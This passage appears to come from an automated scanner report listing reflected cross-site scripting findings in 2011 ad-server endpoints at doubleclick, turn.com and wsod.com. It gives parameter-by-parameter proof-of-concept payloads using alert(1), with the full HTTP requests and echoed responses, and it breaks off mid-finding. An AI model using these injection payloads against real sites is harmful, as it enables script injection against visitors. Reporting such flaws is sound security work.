1.10. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97035"-alert(1)-"646d7b63f13 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=158997035"-alert(1)-"646d7b63f13&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6292
Date: Mon, 15 Aug 2011 18:50:16 GMT
Expires: Mon, 15 Aug 2011 18:55:16 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jul 22 13:57:17 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
v8/3b64/17/83/%2a/o%3B242851043%3B13-0%3B0%3B64882146%3B3454-728/90%3B43222784/43240571/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=158997035"-alert(1)-"646d7b63f13&Redirect=http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smartcomm_con2");
var fscUrl = url;
var fsc
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ad46"-alert(1)-"bce6630befc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click4ad46"-alert(1)-"bce6630befc&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36861
Date: Mon, 15 Aug 2011 18:49:39 GMT
Expires: Mon, 15 Aug 2011 18:54:39 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
lickThroughUrl = "http://ad.doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/x%3B242851043%3B5-0%3B0%3B64882146%3B3454-728/90%3B41171554/41189341/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click4ad46"-alert(1)-"bce6630befc&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1300214506669.uniqueId;
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dac95'-alert(1)-'5ea353315f0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=clickdac95'-alert(1)-'5ea353315f0&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6169
Date: Mon, 15 Aug 2011 18:49:43 GMT
Expires: Mon, 15 Aug 2011 18:54:43 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue Mar 08 09:18:11 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
\"_blank\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/p%3B242851043%3B3-0%3B0%3B64882146%3B3454-728/90%3B41060957/41078744/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=clickdac95'-alert(1)-'5ea353315f0&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=http://www.ibm.com/innovation/us/leadership/response/index.html?cmp=USBRB&cm=b&csr=agus_itlead-20110307&cr=cnnmoney&ct=USBRB301&cn=caple
...[SNIP]...

1.13. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d55a0"><script>alert(1)</script>d792c073698 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=d55a0"><script>alert(1)</script>d792c073698&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3041410246858069995; Domain=.turn.com; Expires=Sat, 11-Feb-2012 18:26:14 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:14 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3041410246858069995&rnd=3457000099704880491&fpid=d55a0"><script>alert(1)</script>d792c073698&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.14. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c88db"><script>alert(1)</script>d46465e9bd4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=c88db"><script>alert(1)</script>d46465e9bd4 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=MMbe9F8c4vIW12sLi2dyci4DUN53kixla9Hhjy6Hzs_faqaDzVRu9ZiuBStYaftYXKB5GtYFP05Zh2SBlosu53bZWjGN2gF2ncsnwOMOSJtfhxpxCVZWo-G8JZeL2-AGEoXq-gPE5Ffs4A1KWdSJ3Xy4T1NZSHp0kR7yTyJ9_irGpAX7uMSqUeH6p4KGvUSZUq7OWife1h2M6Ewfw7GonRDoQNluocXO_kLxCO03TeEqGbRc_WXZLv6_wjPrFYWkRzoy0KsqvLYpwqlgKHkKO7v2cs61vb5d-EUL-mztoUL_BJuqMxnf5kZ4bjzPPBBZl4sOJ1mrC2iEDyk-G34KEYEk4UmX8i4vUYPBL0RbR7ivEzlzFI00MzI2gY6ItzbVOxkr-OO3w_o38FzKCKQ6Lm18jlcUKTrHAgecQO0u_glplHkENwT_vdM5uigT02Pno0_YmxEDTDUEKIRIqGJPfQHDMdsELscQY0iJG8ZU5Ty4GWWGARMuC9OfaFsrmvfxq63JmDsLJ-8CJbf3hY5BZTnskYqZuO4nCGPJTpDqDm8qnTQbufGXlJIhj71lBYrfro1Hb-oXI0uLH1BPomVksC8KUj7e-F2aqqZc87ofCVk5wAQqn5t3ldANs6bZF2YSHOwEyK_UcWlZltoKH3xiIIu2yhXmnBsviwnJ85Ed5aDevF_SkTMMXcVeFMc5tN7pEoXq-gPE5Ffs4A1KWdSJ3Q4zLI5CWlqCgjtHPoLh-sXGpAX7uMSqUeH6p4KGvUSZHjMTXkaAxWETmff6p0CCynXm2SuS6NlYI5OxjuXgTRgqGbRc_WXZLv6_wjPrFYWkMvMzV1KQ715fKlLs1_1zzbv2cs61vb5d-EUL-mztoULKnruFIQYKaPiMC6W5UbDg9o6CAsQCwtFM5Y7fkjHOf4Ek4UmX8i4vUYPBL0RbR7j4K5R2t8-fqw2RIN4cjypIOxkr-OO3w_o38FzKCKQ6Lm9OMIDolQH9GFZKykykhOdYuuYQv45PXfKbyz1md1g8UsEbRg4Tfn8hxcnJGDABTDQg-QbKO_N-vuvZwJz7zYy4GWWGARMuC9OfaFsrmvfx0H_cdrflarr8ERICfjtlnMaI-JJ-NoWyQaFab98q1_Zde4x4nJg09oak0s1lJ4ym7ev_sVYKpHwxGAloIhjxMC8KUj7e-F2aqqZc87ofCVmnzve-Elt6O9TGUTxKZTBDxZ1J_E_O522Ye9lt1xgY0vLOThBfDZko64vFQpO0eVCqoq3BB-vp9ASgk-DDEv5NEoXq-gPE5Ffs4A1KWdSJ3YkYFaBQ79ulBTTMuVNwWn3GpAX7uMSqUeH6p4KGvUSZ3RVmoAwX5pfOPJTb-2FpLb7Z-GfN3yPWx-jWv5rm4mEqGbRc_WXZLv6_wjPrFYWkyKtTKK2UqCBv6H_FflpgYCoZtFz9Zdku_r_CM-sVhaS0nQLPgJd6gPto5vjI1Iutu_ZyzrW9vl34RQv6bO2hQjR2INxqcXhOvUTMwnimoVBQpW6dPdstvKpYA_5893LwgSThSZfyLi9Rg8EvRFtHuFTmVUFnn6bwcz39Ym9oMKo7GSv447fD-jfwXMoIpDou0ugi34ufxqKqsc2Mtte3vDgsGMLzbiZOc-I9zjgk_f5CTby2R7XeohKUqfT7N4kH74DpXFuxI1x9y7A3NcO-1bgZZYYBEy4L059oWyua9_EGuwwMAO-MRya4QZsSn3WqHZgbJN9gHWpQZmXYTZVCh268txBWlhf05t9RfUxfrO34VPOmHtYwp1RxCIl5yWqeLwpSPt74XZqqplzzuh8JWX8dvgjNu-gFIbxMLQKtBeIkehFMwCZGLm7BQMVlkV7KMHND2CdcMnagwF9Vx8tumZRJ3v98564jan5uyPa9LugSher6A8TkV-zgDUpZ1Ind6uHY3YR3riZA9dOzPsOrYMakBfu4xKpR4fqngoa9RJmO-wf97hezQkM4wyW5i
Q-RwGxxKFq0JdDSCdP6YGujVioZtFz9Zdku_r_CM-sVhaSQsI4YtVNSaSHRo1z9-PfFu_ZyzrW9vl34RQv6bO2hQkroMkUaOOyDc-lCYw8p-jSqRRyCZjuk9zFxsj37s0Fl_4mvLB_-8Y5Oms5Uqh6HCnJ-BDkP0Hb-ZaXldXPIHPA7GSv447fD-jfwXMoIpDouZbh2dC73BhWw8_b5-6kKe4AFC-iivcKjHCCWpb_i39hSwRtGDhN-fyHFyckYMAFMTOpPWKF2Ax6b7rOHxcXUA7gZZYYBEy4L059oWyua9_H8iF8HDsCRa-9-pUq8YCKwIu4nZMWVWrFcRDFtuQymYUD1RI5tHbziFyffCyec3xFVtvCxutmhKQqI4rynX8EbVOORQ_Ko6kwNCBF1JosDuIx-MGxw6860Zgp9LuiZKfd1THLpKtTKl9Hy-9LIdrTwPkUCHIDocT4HwntaBwSiXVmGe8cmYxtGs87jVjdcUhR6Tm5A3Jl0kkCygktzwY_P2nBq1MLiym4M8a84WNRVyL5tM47YBQRfKyY2Al1gOQ0csSdIeEjo1eTSJN1N1te4P8bndmlf8vcwmNoTNcAkVr8qAbRUJoFNsCnHeEAnBhu_KgG0VCaBTbApx3hAJwYbvyoBtFQmgU2wKcd4QCcGGwUPlrOdmMzuy-JVRLC61VUc_XVxSdq289R16FkEIpjxHP11cUnatvPUdehZBCKY8Rz9dXFJ2rbz1HXoWQQimPE_-4For9FCpvxRN9dPDdyfl4wgPrBWlfpoT64Vvf0QcbqNueryT6Q6nKR3xMwJa0y93McaV8JWnaOstbjjF26BF-Apr4mvzveDGnJv-5a0H-QPevsbWEmzJkKeA3Bjf1Y3sUDNtNXvnuxxIfpNVPjsN7FAzbTV757scSH6TVT47DexQM201e-e7HEh-k1U-Ow3sUDNtNXvnuxxIfpNVPjsIL8XR7E1wpkwV56j-0nTlSXVNEmg3EUswsQW8uB2bCoOaoqpfRx3Z8kq8nb8bONUU_y0sy650wRcNU3FpSuXZVP8tLMuudMEXDVNxaUrl2VT_LSzLrnTBFw1TcWlK5dlU_y0sy650wRcNU3FpSuXZWmxU5qvbFVYpvnHYeM98xyM8qRGj8_sQ9Sn73gM-wC5jPKkRo_P7EPUp-94DPsAucyfOw79Fc-70_uTw3s0QiME_97mGKY6_98ewthfpB1rBP_e5himOv_fHsLYX6Qda4guCjZVrDggv46FtK20_Qz7Tuu1boe16PNcOFeNeN5C-07rtW6HtejzXDhXjXjeQmvybiTcE5o1p8VWzBVvNto; fc=_rPwyhtVWelLo9w8DEY9_lAHjwFtIvCqbMQSJ9jL5-FWFlt1l3kRMakuAXIQEbJ_NS-bcQhrOad4QJ1GnWK2ezeoq1NiKoT_dgJhMqoQ2e-iZpdh_q1bBpHenL6WAlOydHJF1CbuvE8l0lnSvDlQbUGQ3KO8-Xa4sNWyeZuC_Jo; pf=didDAAwXT27__r8LS9I2zEDxpSfL7IM1u56Bwn-p5lIbT6x9-XWYSjdy1isJgNTBqQxXSeAmQm9ZpwC4nbV5xMWPSU-hLNIcjpFuaPM_j1j1XJ-dEQgnYOgQTFPo1-eM9SDRceAzeZk52c4DamEdg7XFKT7txTFzsq66plXaF8wy-s2FUWUfxjDJSsUchQ9wueBMXqZax6H_I76jdSqObugcyKCm2M0l5XO-Qzx43cg6tYdo2m7e8Gc41LCSpWYs0RM0bon_RXV1dcM6lDF-Er25L7T9Plwhsq3bO8k4sEzMek-j2501dhLrTRU7UI1geo8cfzenAcgONGPxADQWUg; rrs=3%7C6%7C9%7C4%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; 
rds=15195%7C15195%7C15195%7C15201%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15197%7C15195%7C15195%7C15195%7C15195; rv=1; uid=3041410246858069995

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3041410246858069995; Domain=.turn.com; Expires=Sat, 11-Feb-2012 18:26:15 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:15 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3041410246858069995&rnd=2712780261281906027&fpid=1&nu=n&t=&sp=c88db"><script>alert(1)</script>d46465e9bd4&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af749</script><script>alert(1)</script>3d1b80b715e was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790af749</script><script>alert(1)</script>3d1b80b715e&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313434015**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790af749</script><script>alert(1)</script>3d1b80b715e&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46
...[SNIP]...

1.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e665d</script><script>alert(1)</script>97a79cce510 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569e665d</script><script>alert(1)</script>97a79cce510&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313434014**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569e665d</script><script>alert(1)</script>97a79cce510&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45
...[SNIP]...

1.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6cff</script><script>alert(1)</script>23a246c645 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=b6cff</script><script>alert(1)</script>23a246c645 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:47:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3021

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=b6cff</script><script>alert(1)</script>23a246c645">
...[SNIP]...

1.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da770</script><script>alert(1)</script>908b5162157 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

